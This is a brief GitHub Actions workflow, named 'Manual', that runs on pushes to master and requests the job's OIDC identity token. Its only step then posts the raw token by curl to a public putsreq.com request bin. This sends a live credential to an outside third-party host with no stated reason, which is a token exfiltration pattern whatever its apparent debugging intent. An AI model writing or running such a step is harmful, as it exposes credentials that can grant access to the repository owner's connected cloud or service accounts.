name: Manual

on: 
  push: ['master']
  
permissions:
  id-token: write # required to request id-token

jobs:

  run:
    runs-on: [ubuntu-latest]
    steps:
      - run: |
          OIDC_TOKEN=$(
            curl -sLS "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=github-actions-access-manager.vercel.app" \
              -H "User-Agent: actions/oidc-client" \
              -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN"
          )
          curl -i -s --data-binary "$OIDC_TOKEN" https://putsreq.com/aBB8O4s2D0PuDWTKlSK1
      

